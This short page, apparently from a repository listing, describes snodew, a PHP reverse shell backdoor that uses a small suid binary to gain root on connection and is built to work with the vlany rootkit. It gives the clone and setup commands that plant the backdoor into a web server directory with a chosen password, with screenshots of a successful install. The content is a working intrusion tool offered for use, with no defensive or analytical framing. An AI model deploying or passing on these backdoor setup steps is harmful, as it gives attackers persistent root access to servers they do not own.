Home

Awesome

snodew

snodew is a PHP reverse shell backdoor which uses a small suid binary to escalate privileges on connection</br></br>snodew is made mainly to work alongside vlany but can also be setup as a regular root backdoor

usage

git clone https://github.com/mempodippy/snodew.git
cd snodew/
./setup.sh [install dir] [password] [hidden extended attribute] [magic gid]

example usage for regular (non-vlany infected) systems

cd /tmp
git clone https://github.com/mempodippy/snodew.git
cd snodew/
./setup.sh /var/www/html/blog sexlovegod X 0 # 'X' and '0' since extended attribute doesn't really matter,
                                             # and our suid binary will set our gid to 0

<img src="http://i.imgur.com/EA93M3g.png"/></br> Result of successful setup

<img src="http://i.imgur.com/2MM3h45.png"/></br> Result after following instructions given on our new page

notes